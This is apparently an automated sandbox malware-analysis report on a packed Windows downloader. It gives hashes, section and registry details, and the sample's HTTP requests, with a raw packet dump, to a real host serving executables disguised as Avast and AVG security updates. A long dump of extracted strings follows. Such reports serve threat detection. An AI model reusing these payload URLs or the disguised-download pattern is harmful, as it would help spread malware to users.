Analysis Date2014-10-07 01:29:40
MD5a95872a4900cb20d3030d749cace5e0c
SHA1c575ba2711645e09259bf510fac74f8985413ff1

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
SectionCODE md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
SectionDATA md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
SectionBSS md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
Section.idata md5: 35178448d4578a980f9aba55a38e38b0 sha1: a4c2afe2dd3df0a63a0efe3a559aac6779ea882d size: 8192
Section.tls md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
Section.rdata md5: de85a91d4020adeb5b34c6aceb8dee5e sha1: 4b61908990e759713c25ecb6c0929413dd3c4c2a size: 512
Section.delete md5: 25544bbda2867b3c4df48e2b929dac94 sha1: 8be9f5bc4d7d5103b6b8544e0b967e5501c7565e size: 512
Section.rsrc md5: 5863a3c0dc89e04365d04239a02ad31a sha1: 5fd90358e5226f735c9285eee34c144981567bfb size: 30208
Section.pklstb md5: 4cf64bc626e6162d6860602369e439ae sha1: 857575d03dfd2e208705017b82343c5e1b04495f size: 200192
Section.relo2 md5: 7ebaecdcb587569f3e9a365fcd2b2fe3 sha1: e88813a6600e67bfbd00a848ab7d9249233ea942 size: 512
Timestamp1992-06-19 22:22:17
VersionLegalCopyright:
InternalName:
FileVersion: 1.0.0.0
CompanyName:
LegalTrademarks:
ProductName:
ProductVersion: 1.0.0.0
FileDescription:
OriginalFilename:
PackerPKLITE32 1.1
PEhash19d3471753cb127dbfa8d48acebdb996a57a853d
IMPhashabbfbd1df80ab2b9bf845c919f3183b5

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates File\Device\Afd\AsyncConnectHlp
Winsock DNSforumdistrital.com
Winsock URLhttp://forumdistrital.com/boy2014musicas/avastsecuritversao.exe
Winsock URLhttp://forumdistrital.com/boy2014musicas/avgsecuritversao.exe

Network Details:

DNSforumdistrital.com
Type: A
50.23.134.43
HTTP GEThttp://forumdistrital.com/boy2014musicas/avastsecuritversao.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://forumdistrital.com/boy2014musicas/avgsecuritversao.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP192.168.1.1:1032 ➝ 50.23.134.43:80
Flows TCP192.168.1.1:1033 ➝ 50.23.134.43:80

Raw Pcap
0x00000000 (00000)   47455420 2f626f79 32303134 6d757369   GET /boy2014musi
0x00000010 (00016)   6361732f 61766173 74736563 75726974   cas/avastsecurit
0x00000020 (00032)   76657273 616f2e65 78652048 5454502f   versao.exe HTTP/
0x00000030 (00048)   312e310d 0a416363 6570743a 202a2f2a   1.1..Accept: */*
0x00000040 (00064)   0d0a4163 63657074 2d456e63 6f64696e   ..Accept-Encodin
0x00000050 (00080)   673a2067 7a69702c 20646566 6c617465   g: gzip, deflate
0x00000060 (00096)   0d0a5573 65722d41 67656e74 3a204d6f   ..User-Agent: Mo
0x00000070 (00112)   7a696c6c 612f342e 30202863 6f6d7061   zilla/4.0 (compa
0x00000080 (00128)   7469626c 653b204d 53494520 362e303b   tible; MSIE 6.0;
0x00000090 (00144)   2057696e 646f7773 204e5420 352e313b    Windows NT 5.1;
0x000000a0 (00160)   20535631 3b202e4e 45542043 4c522032    SV1; .NET CLR 2
0x000000b0 (00176)   2e302e35 30373237 290d0a48 6f73743a   .0.50727)..Host:
0x000000c0 (00192)   20666f72 756d6469 73747269 74616c2e    forumdistrital.
0x000000d0 (00208)   636f6d0d 0a436f6e 6e656374 696f6e3a   com..Connection:
0x000000e0 (00224)   204b6565 702d416c 6976650d 0a0d0a      Keep-Alive....

0x00000000 (00000)   47455420 2f626f79 32303134 6d757369   GET /boy2014musi
0x00000010 (00016)   6361732f 61766773 65637572 69747665   cas/avgsecuritve
0x00000020 (00032)   7273616f 2e657865 20485454 502f312e   rsao.exe HTTP/1.
0x00000030 (00048)   310d0a41 63636570 743a202a 2f2a0d0a   1..Accept: */*..
0x00000040 (00064)   41636365 70742d45 6e636f64 696e673a   Accept-Encoding:
0x00000050 (00080)   20677a69 702c2064 65666c61 74650d0a    gzip, deflate..
0x00000060 (00096)   55736572 2d416765 6e743a20 4d6f7a69   User-Agent: Mozi
0x00000070 (00112)   6c6c612f 342e3020 28636f6d 70617469   lla/4.0 (compati
0x00000080 (00128)   626c653b 204d5349 4520362e 303b2057   ble; MSIE 6.0; W
0x00000090 (00144)   696e646f 7773204e 5420352e 313b2053   indows NT 5.1; S
0x000000a0 (00160)   56313b20 2e4e4554 20434c52 20322e30   V1; .NET CLR 2.0
0x000000b0 (00176)   2e353037 3237290d 0a486f73 743a2066   .50727)..Host: f
0x000000c0 (00192)   6f72756d 64697374 72697461 6c2e636f   orumdistrital.co
0x000000d0 (00208)   6d0d0a43 6f6e6e65 6374696f 6e3a204b   m..Connection: K
0x000000e0 (00224)   6565702d 416c6976 650d0a0d 0a0d0a     eep-Alive......


Strings
.
>
040904E4
1.0.0.0
BBABORT
BBALL
BBCANCEL
BBCLOSE
BBHELP
BBIGNORE
BBNO
BBOK
BBRETRY
BBYES
CompanyName
DLGTEMPLATE
DVCLAL
FileDescription
FileVersion
InternalName
LegalCopyright
LegalTrademarks
MAINICON
OriginalFilename
PACKAGEINFO
PLATFORMTARGETS
PREVIEWGLYPH
ProductName
ProductVersion
StringFileInfo
TQCNHQ0
Translation
VarFileInfo
VS_VERSION_INFO
~@_^][
=	= =(=~=
;	<(<:<
?/?>?{?
"""""/
""""""
""""""""
"""""""""""
0 0$0(0,0004080<0@0D0H0L0P0T0X0\0`0d0h0l0p0t0x0|0
0 0$0(0,0004080<0@0D0H0L0P0T0X0\0`0d0h0p0
0 0$0(0,0004080<0@0D0H0L0P0T0X0\0`0d0x0
0 0$0(0,0004080<0@0D0H0L0P0T0X0\0`0l0w0{0
0 0$0(0,0004080<0@0D0O0[0b0m0
0 0$0(0,0004080<0@0D0R0Z0b0j0r0z0
0 0$0(0,0004080<0L0l0t0x0|0
0 0$0(0,00040D0d0l0p0t0x0|0
0 0%0.040I0W0]0h0
&000:0C0S0b0l0
0 0-010D0d0l0p0t0x0|0
0"0*020:0B0J0R0Z0b0j0r0z0
0 0)050>0J0S0_0d0o0z0
0:0\0a0{0
0#0>0J0R0d0
0$0?0Q0k0
0(0<0T0h0|0
001D1g1t1
0$060F0S0_0l0~0
0(090E0Y0g0v0
<0@0D0,181<1`1d1
0$0D0L0P0T0X0\0`0d0h0l0p0t0x0|0
!0;0E0
0,0M0\0s0
)01070C0K0
0$1)11161K1P1X1v1
?0,171c2i2y2
0	1k1v1
%030R122D2Y2n2
?$?(?,?0?4?8?<?@?D?H?\?l?|?
; ;$;(;,;0;4;8;<;@;D;H;L;`;
> >$>(>,>0>4>8><>@>D>H>L>P>T>X>\>`>d>h>l>p>~>
= =$=(=,=0=4=8=<=@=D=H=L=P=T=X=\=`=d=h=l=p=t=x=|=
> >$>(>,>0>4>8><>@>D>H>L>P>T>X>\>`>d>h>l>p>t>x>|>
; ;$;(;,;0;4;8;<;@;D;H;L;P;T;X;\;`;d;h;l;p;t;x;|;
: :$:(:,:0:4:8:<:@:D:H:L:P:T:X:\:`:d:h:l:p:t:x:|:
? ?$?(?,?0?4?8?<?@?D?H?L?P?T?X?\?`?d?h?l?p?t?x?|?
? ?$?(?,?0?4?8?<?@?D?H?L?P?T?X?\?`?d?h?l?z?
> >$>(>,>0>4>8><>@>D>H>L>P>T>X>\>`>h>x>
= =$=(=,=0=4=8=<=@=D=H=L=P=T=X=\=j=r=z=
< <(<,<0<4<8<<<@<D<H<V<h<
> >$>(>,>0>4>8>L>a>e>s>w>{>
< <$<(<,<0<4<8<<<@<N<V<l<
= =$=(=,=0=4=D=]=
=$=(=0=4=<=@=H=L=T=X=`=d=l=p=
=0>5>A>T>Y>f>
?(?0?5?[?z?
; ;(;0;8;@;H;P;X;`;h;p;x;
: :(:0:8:@:H:P:X:`:h:p:x:
,090b0
,0@A@S
^0b0f0j0n0r0v0z0~0
$0B0n0
0CQQoj
0-ga4?
< <,<0<<<@<H<L<P<T<X<\<`<d<h<l<p<t<x<|<
 <0Kq'
;%;0;@;K;V;f;r;
=!=&=0=@=K=X=]=
0N0S0m0
0n2X;Q
=#=0===O=T=o=|=
; ;$;(;,;0;P;p;x;|;
>0>P>s>
?"?&?*?0?P?x?
<0<@<P<X<\<`<d<h<l<p<t<x<|<
>0>P>X>\>`>d>h>l>p>t>x>
0pX,og
= =$=(=,=0=U=c=r=
)0W041
0y1.2.3
)0Z0k0
0Zm[3%
101J1T1^1h1w1
10P0s0|0
1+101:1@1H1
1(1014181<1@1D1H1L1P1d1
1 101A1E1V1^1
1 1$1(1,1014181<1@1D1H1L1P1T1X1\1`1d1h1l1p1t1x1|1
1 1$1(1,1014181<1@1D1H1L1P1T1X1\1t1
1 1$1(1,1014181<1@1D1H1L1X1c1g1~1
1 1$1(1,1014181<1L1l1t1x1|1
1"1&1*1.12161:1>1B1F1J1N1R1V1Z1^1b1f1j1n1r1v1z1~1
1'111;1Q1w1
1'11161;1@1E1K1P1U1[1b1h1o1u1|1
1"1*121:1B1J1R1Z1b1j1r1z1
1'1/1b1
1.1=1N1
	11282
1$161>1I1N1Y1`1
1&191C1
1/1B1K1f1y1
1$1C1s1
1<1D1H1L1P1T1X1\1`1d1h1l1p1t1
1'1L1W1
1:1p1}1
1/2=2K2Y2v3
1'3[4B5x5
141A1K1\1a1q1x1
>!>%>)>->1>5>9>=>A>E>I>M>Q>U>Y>]>a>e>i>m>q>
161:1>1B1F1J1N1\1k1o1}1
;1<9<?<K<R<
1A1I1M1c1k1o1
1c>zX[S
1e1i1m1
^1g1q1
;1;@;j;
1L].0b\I
1S5q,F
:;;+<1<T<Z<
>,>1>W>\>
2$2,2024282<2@2D2H2L2`2
2$2,2024282<2@2D2H2L2P2T2X2\2`2d2h2l2p2t2x2|2
2 2(20282@2H2P2X2`2h2p2x2
2 2%212;2A2I2j2r2
2'2-21272;2A2E2K2O2U2Y2_2c2i2m2s2w2
2 2$2,20282<2D2H2P2T2c2o2
2"222>223:3K3W3a3J4P4[4z5<6@6D6H6L6P6T6u8
2"2*222:2B2J2R2Z2b2j2r2z2
2 2$2(2,272C2J2T2^2h2s2}2
2!2'2@2`2h2l2p2t2x2|2
2&2.262
2&2.262>2F2N2V2^2f2n2v2~2
2	2(292W2^2q3
2"2@2D2H2L2b2f2j2n2
2%2.2L2R2Z2
2+2:2Q2
2&232?2L2^2f2s2
2(282@2H2P2X2`2h2p2x2
2%2C2e2t2
2(2H2P2T2X2\2`2d2h2l2p2
2'2I2W2^2v2}2
2&2i2z4
2!303G3
2"3-353D3X3f3n3}3
2&3T3h3
252=2U2]2a2w2
252=2V2b2u2
263N3q3
>">&>*>.>2>6>:>>>B>F>J>N>R>V>Z>^>b>f>j>n>r>v>z>~>
= =&=2=7=B=G=L=W=\=a=l=q=v=
< <%<2<7<D<I<V<[<h<m<z<
292_2l2{2
>">*>2>:>B>J>R>Z>b>j>r>z>
?"?*?2?:?B?J?R?Z?b?j?r?z?
[2bO]~1|
:	:(:2:d:
2F3*4h4
2F3V3"4?4(686Y6q6%7D7a7
:!:2:?:F:J:P:T:Z:a:e:
{2.H$,
:*:.:2:I:M:Q:l:|:
;*;.;2;J;N;R;l;|;
2L2W2e2
$2 w5j*
2X2`2h2p2x2
30395=5A5E5I5M5Q5U5Y5]5a5e5i5m5q5u5y5}5
314r4y4
323:3B3J3R3Z3b3j3s3
324?4]4
3&313C3V3{3
3*323P3X3\3p3x3
3 3(30383@3H3P3X3`3h3p3x3
3"3*323:3B3J3R3Z3b3j3r3z3
3$3+3}3
3 3$3(32363H3Y3]3
3 3$3(3,3034383<3@3D3H3L3d3t3
3 3$3(3,3034383<3@3D3H3L3P3T3X3\3`3d3h3l3p3t3x3|3
3#3'3+3/333.4T4x4
3#3.333>3C3N3S3e3t3
3 3$3,3@3H3L3P3T3X3\3`3d3h3v3~3
3#3/3<3N3[3g3t3
3 3(3D3b3
3!3;3k3
3'3;3x3
3*363P3\3o3w3{3
3*373C3J3\3n3y3
3$3A3^3
3@3D3H3L3P3T3X3\3`3d3h3l3p3t3x3|3
3=3h3w3
3(3K3z3+4G4
3-4;4@4K4Q4V4a4g4l4w4}4
3$464\4|4
3^4r4z4
363Z3b3h3n3
37!aN<
<3=7=;=?=C=G=K=g=
;#;';+;/;3;8;
383@3D3H3L3P3T3X3\3`3t3
383I3l3
3B4W4z4
=!=.=3=@=E=R=W=d=i=v={=
>(>3>=>H>R>]>g>r>|>
3I>0o5
3M5Q5U5Y5]5a5e5i5m5q5u5y5}5
?3|R\<T
<	=3>@>s>y>
3W3;4{5
<3<X<d<y<
40>0R0W0c0w0
404G4X4
4$40444@4D4L4P4T4X4\4`4d4h4l4p4t4x4|4
4$4,4044484<4@4D4H4L4P4T4X4\4`4d4h4l4p4t4x4|4
4 4(40484@4H4P4X4`4h4p4x4
4"4*424:4B4J4R4Z4b4j4r4z4
4$4(4,4044484<4@4D4H4L4P4T4X4\4`4d4h4l4p4t4x4|4
4$4(4,404H4^4b4s4{4
4"4'454>4C4H4V4_4d4i4w4
4*474C4K4T4\4o4
4+474M4U4r4z4~4
4"484@4N4`4p4y4
4%4B4J4b4n4
4-4D4T4
4?4f5v5
4*4H4c4g4x4
4(4H4P4T4X4\4`4d4h4l4p4
4.5:5D5T5m5
4 585\5u5
4?5D5{5
4@5J5d5
476N6U6
=(=4=8=<=@=D=H=L=P=T=X=\=`=d=h=l=p=t=x=|=
< <(<,<4<8<@<D<L<P<X<\<d<h<p<t<|<
4CJG%o
4D4K4Z4a4
?$?4?D?L?P?T?X?\?`?d?h?l?p?t?x?|?
>$>,>4><>D>L>T>\>d>l>t>|>
4e4p4y4
:':4:F:N:V:^:f:n:v:~:
<4=\=k=
:#:4:L:
4L4T4\4d4l4t4|4
4P5T5X5\5`5d5h5l5p5t5x5|5
.4pETW
>4?R?_?
> >$>4>T>\>`>d>h>l>p>t>x>|>
;!;+;5;
51595P5X5p5x5
535>5G5U5h5
5"5*525:5B5J5R5Z5b5j5r5z5
5'5-525=5C5H5S5Y5^5i5o5t5
5$5,545<5D5L5T5\5d5l5t5|5
5&5*5.525H5_5c5t5
5$5+555
5 5$5(5,5054585<5@5D5H5L5P5T5X5\5`5d5h5l5p5t5x5
5 5$5(5,50545B5J5&6*6.62666:6>6B6F6J6N6R6V6Z6^6b6f6j6n6r6v6z6~6
5 5$5(5,5@5`5h5l5p5t5x5|5
5 5$5(5<5\5d5h5l5p5t5x5|5
5!5)5-5@5L5e5m5q5
5 5.5>5B5F5P5[5_5m5
5%5*5[6g6t6
5 5?5b5j5t5y5
5&5:5D5W5
5+5=5U5
5.5E5p5
5/636V6Z6
5$646@6D6L6P6T6X6\6`6d6h6l6p6t6x6|6
5-646V6
565R5[5x5
5]6d6&7
5-6g6v6}6
5B5j5z5
?5?C?R?i?
>(>5>G>L>d>
5.i$X$v
5[:k:c<s<
\=[_5K_=[W5KW=
5o?^ENN
;);5;O;[;s;
5R6t6	7
:$:5:@:S:
5&S%,D
5u%f 1R
:!:+:5:?:U:[:i:|:
:5:W:^:
607E8r8
616@6y7
646C6H6h6x6
(6*|4F3>
6#60646<6P6X6\6`6d6h6l6p6t6x6
6)616L6l6t6x6|6
6$63676E6I6M6k6o6s6
6$6(6064686<6@6D6H6L6P6X6h6
6$6+61696O6Z6o6y6
6"6*626
6'6/636K6S6W6n6z6
6$6,646<6D6L6T6\6d6l6t6(7,70747<7@7D7H7L7P7T7X7\7`7d7h7l7p7t7x7|7
6 6$6(6,6064686<6@6D6H6L6P6T6h6{6
6 6$6(6,6064686<6@6D6H6L6P6T6X6\6`6d6h6l6p6t6x6|6
6 6$6(6,6064686<6@6D6H6L6P6T6X6l6
6*6:6@6`6h6l6p6t6x6|6
6#6.6@6R6c6m6~6
6#6/676
6-696>7`7
6-6d6v6|6
6!7)7-7I7Q7U7k7s7w7
6#7(7P7_7
6]7d7{7b9v9
6;7G7T7f7
697H7Q7z7
6e7A8f8
:.:6:E:O:Z:_:l:|:
>(6eu?
:6:^:f:
;$;);6;;;H;M;Z;_;l;q;~;
6I8R8u8~8
6j8t8|8
;-;6;>;K;Q;Y;j;s;~;
;6Q8y}Z
?+?6?W?m?
<$<6<X<h<x</=;=g=s=
: ;%;7;^;_<
707>7Q7e7
707F7J7`8m8
767=7G7M7T7^7c7i7n7t7y7
7 707=7
7+737N7V7r7z7
7!7)747F7V7^7m7w7|7
7 7$7(7,7074787<7@7D7H7
7 7$7(7,7074787<7@7D7H7L7P7T7X7\7h7
7 7$7(7,7074787<7@7R7V7Z7^7b7f7
7"7&7*7.72767:7>7B7F7J7N7R7V7Z7^7b7f7j7n7r7v7z7~7
7#7(7-777<7A7c7o7|7
7 7$7(7,7:7B7J7X7\7p7
7#7)777=7K7V7j7{7
7(7,7H7P7T7X7\7`7d7h7l7p7
7#7+7L7p7
7(7B8~9
77s/	9
7-7X7b7l7t7
7+8o8{8
7;9m9d:I<M<Q<U<Y<]<a<e<i<
7ceL)WdiX
=7>;>C>H>
7HD$!R
7I8f8u8
7L8`8m8
=">*>7>>>L>W>]>v>
%7@/tF;^
7vvRZ~p9e
?7?X?x?
7z8a;l;"<
818H9u9
819i9{9a:
:85T0S-
878?8L8Q8W8
8 828<8I8U8^8d8q8}8
8 8$8(8
8$8(8,8084888<8@8D8H8L8P8d8
8 8(8,8084888<8@8D8H8L8P8T8X8\8`8d8h8l8p8t8x8|8
8 8$8(8,8084888<8@8D8H8`8x8|8
8 8$8(8,8084888<8@8D8H8L8P8T8X8
8 8$8(8,8084888<8@8D8H8L8P8T8X8\8`8d8h8l8p8t8x8|8
8 8$8(8,8084888<8@8D8T8t8|8
8,888<8D8H8L8P8T8X8\8`8d8h8l8p8x8
8!8-8C8O8e8q8
8#8,8T8]8f8l8}8
8.8A9P9{9
8;8c8u8
8:9A9S:
8#9Q9t9
8a8e8i8m8t8
;';.;8;B;L;X;c;t;z;
8B;&oFv
>8>C>Z>z>
;8;@;D;H;L;P;T;X;\;`;d;h;l;p;t;
8I_7T]D
:8ib!ro
?(?8?I?V?x?
8k9o9s9w9{9
8/	kq^
>$>8>L>`>t>
8'}MEO
8o9<:[: <O<
8p94:;:
8tLBC!
8V8h8t8
8X8m8t8
? ?$?(?8?X?`?d?h?l?p?t?x?|?
8Y9i9):
90:?:~:
90:4:8:<:@:
909D9H9\9l9x9|9
929h9{9
979G9~9
9"909l9
9+979O9[9v9
9 9(90989@9H9P9X9`9h9p9x9
9$9+92999@9G9N9U9\9c9j9q9x9
9 9$929V9Z9^9|9
9%9-959=9
9 9(9,94989@9D9L9P9X9\9d9h9p9t9|9
9 9$9(9,9094989<9@9D9H9P9T9\9`9d9h9l9p9t9x9|9
9 9$9(9,9094989<9@9D9R9^9h9s9w9
9 9$9(9,9094989<9X9x9
9 9$9(9,9094989L9l9t9x9|9
9"9&9*9.92969:9>9B9F9s:z:
9/9>9X9e9i9
9'9X9_9
;9;=;D;
9]e^\Q_
<9<><e<r<
9!:F:R:
9i:3;};
9::K:n:
;$<9<N<S<`<
9;`v'B
9*:::W:p:
ActivateKeyboardLayout
AdjustWindowRectEx
advapi32.dll
a?	feC
aJ12cL3
aJ14dM4
aJ19fN6
AJ$^b6
</assembly>
      <assemblyIdentity
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
+axhzUe
axwLAR((
B/4NuO>
"+]$B6
`B9XJ&
&BC3Z!D
 Bc'@r
bD)'3{6
~B-dc[0
<b]dWB
BeginPaint
BitBlt
B[$Iy_w
bK10`I1l`I1
B^OQ,s
b>($Pf
B.rsrc
:B##=w
BwG,]z
>B?Z?i?v?{?
<!<<<c<
C6(_s_I
CallNextHookEx
CallWindowProcA
CeID"L
;!;;;C;^;f;
CharLowerA
CharNextA
CharToOemA
CheckMenuItem
cI/:_r
 ck_CO
cL2<cL3
cL3HgO8
cL3=jS:
ClientToScreen
CloseHandle
cM3HkT;
cN8{_J5OP?-
&C<[;O.
comctl32.dll
CompareStringA
Couldn't allocate memory!
CreateBitmap
CreateBrushIndirect
CreateCompatibleBitmap
CreateCompatibleDC
CreateDIBitmap
CreateDIBSection
CreateEventA
CreateFileA
CreateFontIndirectA
CreateHalftonePalette
CreateIcon
CreateMenu
CreatePalette
CreatePenIndirect
CreatePopupMenu
CreateSolidBrush
CreateThread
CreateWindowExA
cSC"lWB
)c{w^`
?/?C?w?
cxM`g2
""""""""D{
D6)hjVB
d:az(,
}D////D}{
{}DD////DDb
DDffgw
DDGwwwwwwwww
DDpwwwwwwww
DefFrameProcA
DefMDIChildProcA
DefWindowProcA
DeleteCriticalSection
DeleteDC
DeleteMenu
DeleteObject
  </dependency>
  <dependency>
    </dependentAssembly>
    <dependentAssembly>
DestroyCursor
DestroyIcon
DestroyMenu
DestroyWindow
dFfffw
DFfff`wx
Dfffpwwwwxh
Dfff`w
{}D/GG1101011GGD`{xw
}DGGD}
<<<D<H<L<P<T<X<\<`<d<
DHwwwwxo
DispatchMessageA
/diZk0
<$<(<D<L<P<T<X<\<`<d<h<l<p<t<x<|<
dM4whQ8
dM68hQ:
DO@wwwwwwwww
D$p_^]
Dpwwxgw
)dr)8%	
DrawEdge
DrawFrameControl
DrawIcon
DrawIconEx
DrawMenuBar
DrawTextA
$dSZin
duBJ07E
^dV53`%
d,wa"z	o
Dxjcwr*
Dy/5Ak
=E>a>h>
E<BjXX
`E"FV?!wS>"wQ<!
eG]5!L;l 
Eg$Y5y
<(<@<e<l<
ElaV.SY
+EM1v9
eM4VjS;
EM{v3c4
;$<E<N<
eN4zkT<
eN77kT=
eN78kT=
EnableMenuItem
EnableScrollBar
EnableWindow
EndPaint
EN]Fm]
:);e;n;s;|;
EnterCriticalSection
EnumCalendarInfoA
EnumThreadWindows
EnumWindows
eO]F\L
;E;];p;
EqualRect
eQ:w')
:E;R;b;|;
eSB2lWB
>E>S>b>y>
<=<E<S<s<
E.' uMA5
ExcludeClipRect
ExitProcess
explode returned %d
<&<f<|<
,f37	~p
f%ae8y
@fbygB
Ffdpwwwwww
ffffff
ffffffff
FFpwwwx
fgK!wmQ(
f,]\\I^
FillRect
FindClose
FindFirstFileA
FindResourceA
FindWindowA
<f=j=n=r=v=|=
;f<j<v<|<
fn+-	\`[Iy
FormatMessageA
;F;p;~;
Fpwwwwwwwwww
FqZ98NgT
FrameRect
FreeLibrary
FreeResource
FRot%6
F-TQXl
?+?f?y?
FZ>A*P
<%<;<g<
"""""""""G
{}/G011
g0(o,L,ze
G9)!oYD
}ga'K:
gdi32.dll
GetACP
GetActiveWindow
GetBitmapBits
GetBrushOrgEx
GetCapture
GetClassInfoA
GetClassNameA
GetClientRect
GetClipBox
GetCommandLineA
GetCPInfo
GetCurrentPositionEx
GetCurrentProcessId
GetCurrentThreadId
GetCursor
GetCursorPos
GetDateFormatA
GetDCEx
GetDCOrgEx
GetDesktopWindow
GetDeviceCaps
GetDIBColorTable
GetDIBits
GetDiskFreeSpaceA
GetFileVersionInfoA
GetFileVersionInfoSizeA
GetFocus
GetForegroundWindow
GetFullPathNameA
GetIconInfo
GetKeyboardLayout
GetKeyboardLayoutList
GetKeyboardState
GetKeyboardType
GetKeyNameTextA
GetKeyState
GetLastActivePopup
GetLastError
GetLocaleInfoA
GetLocalTime
GetMenu
GetMenuItemCount
GetMenuItemID
GetMenuItemInfoA
GetMenuState
GetMenuStringA
GetModuleFileNameA
GetModuleHandleA
GetObjectA
GetPaletteEntries
GetParent
GetPixel
GetProcAddress
GetPropA
GetScrollInfo
GetScrollPos
GetScrollRange
GetStartupInfoA
GetStdHandle
GetStockObject
GetStringTypeExA
GetSubMenu
GetSysColor
GetSysColorBrush
GetSystemInfo
GetSystemMenu
GetSystemMetrics
GetSystemPaletteEntries
GetTextExtentPoint32A
GetTextMetricsA
GetThreadLocale
GetTickCount
GetTopWindow
GetVersion
GetVersionExA
GetWindow
GetWindowDC
GetWindowLongA
GetWindowOrgEx
GetWindowPlacement
GetWindowRect
GetWindowTextA
GetWindowThreadProcessId
GgPPTL
G.}i Hk
gi=&HO
GlobalAddAtomA
GlobalAlloc
GlobalDeleteAtom
GlobalFindAtomA
GlobalFree
GlobalHandle
GlobalLock
GlobalReAlloc
GlobalUnlock
;G;N;e;
, gnh(
gO8ynXA
>%?G?o?x?
gP8@nW@
H.@/)@
+H@<0=
]H8(3h
H9*Sr]H
hBW9u-sS9
h:faYzv
{HHdgY>
hkm@~q
? ?$?(?,?@?`?h?l?p?t?x?|?
: :@:H:L:P:T:X:\:`:d:h:
< <,<@<H<L<P<T<X<\<`<d<h<l<p<t<x<|<
= =@=H=L=P=T=X=\=`=d=h=x=
>h>l>t>x>
h,)n$Y
=(=H=P=T=X=\=`=d=h=l=p=
(h|q[|q+
hR:HgQ:vhQ:
:,:`:h:s:
+hS0XA
:HTl/8
hwwwwwpw
hwwwwww
hwwwwwwp
>$>H>Y>
>i*-+=
^I+2`K.G
)I4.+=
[I5avaK
`I9(Xc
Iad'Qj
i}/A/U
.idata
ImageList_Add
ImageList_BeginDrag
ImageList_Create
ImageList_Destroy
ImageList_DragEnter
ImageList_DragLeave
ImageList_DragMove
ImageList_DragShowNolock
ImageList_Draw
ImageList_DrawEx
ImageList_EndDrag
ImageList_GetBkColor
ImageList_GetDragImage
ImageList_GetIconSize
ImageList_GetImageCount
ImageList_Read
ImageList_Remove
ImageList_ReplaceIcon
ImageList_SetBkColor
ImageList_SetDragCursorImage
ImageList_SetIconSize
ImageList_Write
InflateRect
i*Ng8N
InitializeCriticalSection
InsertMenuA
InsertMenuItemA
<I=N=S=g=
InterlockedDecrement
InterlockedExchange
InterlockedIncrement
IntersectClipRect
IntersectRect
InvalidateRect
^IP~	Ji5
iq\Qe.0
`iQthj
iR:DjS;
IsChild
IsDialogMessageA
IsIconic
iS=)iR<_gQ;
IsRectEmpty
IsWindow
IsWindowEnabled
IsWindowVisible
IsZoomed
&It\FG
-?iTVq8
_@Iyo>
}	<J0'^
J/;|+3
J62Gaq)0
JB_t_HW
jCo~"G
JH}.j.
jkPl3f
`jP<<^
Jq)Irj
	jSA~j
~%j=tt
jUG|gSw
/K.*^=
`K7hVD22
kernel32.dll
K/GM/k
<@<K<h<r<
KillTimer
KiW"ks>
>K>N?l?
>?>K>R>]>g>q>{>
KsvYaq
^^KU3	
kU=wlV>
#kv+Tr
[Kwg?3=
l[}\9/
lAG*w~
        language="*"
LeaveCriticalSection
          level="asInvoker"
LIf+pU[J
LineTo
~Lja%v
L`[LGm
Lmo'G$
lNe">/@
Ln$)m&
LoadBitmapA
LoadCursorA
LoadIconA
LoadKeyboardLayoutA
LoadLibraryA
LoadLibraryExA
LoadResource
LoadStringA
LocalAlloc
LocalFree
LockResource
lp{gd1K)
:*:?:L:Q:^:c:p:u:
=-=L=Q=V=[=`=
"lS(j+
lstrcpyA
lstrcpynA
lstrlenA
LTBTb~
l|u9}S"l`
m	_=${
MapVirtualKeyA
MapWindowPoints
MaskBlt
m,B;-~
M@BLPu
MemExpReadIt  % 6d / % 6d / % 6d / % 6d
MemExpWriteIt % 6d / % 6d
MessageBoxA
%m-:j6
;M"j -=6
MK`tG9f
m}m7(W+
m_nCompressedBufSize = %d 
m_nCompressedPosition = %d
m_nOriginalPosition = %d  
MoveToEx
{(m)UjQ
MulDiv
MultiByteToWideChar
M>/|vaM
 /("MWK?
mW?wnYB
<@<M<Z<o<t<
_|n1A_
N5Ypg0
/n6JU|
]n7ll<^h
        name="Microsoft.Windows.Common-Controls"
;$;N;b;
ne\tO/
nG]#uSRC
n\Hhs^G
#Ni'DQo 
nry?;^
nr##zW
NW0Z4$
<N=Y=x=
;N<Z<c<h<t<}<
Nze-YIOV
=$=<=o=
'O1 (ER
O2u>tF
O#>\58,
O$`8-`
)o+a]I
)oB~0Jd
oDZF^M?
OemToCharA
OffsetRect
`_O:?h
?/?O?[?h?z?
+;oIn&
O;&L."
oleaut32.dll
OL.reC
! ]OsQ
O]\T\M
:+;o;v;
#Ov%w	
	oZD[mW?
\ozh)	
p4yxNi"
PatBlt
$pCD1M
P.delete
PeekMessageA
p[E)hR9
p[F_lU>
=P=]=f=o=
>/>@>P>f>r>
@(#)PKLITE32 Copyright 1998 PKWARE Inc., All Rights Reserved ($Revision: $)
.pklstb
PKLT32
PL"'#{
PostMessageA
PostQuitMessage
        processorArchitecture="*"/>
PtInRect
        publicKeyToken="6595b64144ccf1df"
P<uN**2
=&pW0m
PWh-|I
pwwwwww
pwwwwwwwww
pwwwwwwwwxo
=P=X=^=j=r=
P!%Yh]
P^:Yn~ 
>#>Q>^>{>
;	<)<Q<
?Q6o2~l
!q7m]w
Q>9*]o
? ?*?<?Q?\?a?f?s?
QcM<v?0
Q/,:D)E
QdK_T0={
Qdpw53)
=%=*=/=Q=e=
#Q^G[8
q!q8t}
q}%U2dC
?qvocm#
RaiseException
.rdata
ReadFile
RealizePalette
RectVisible
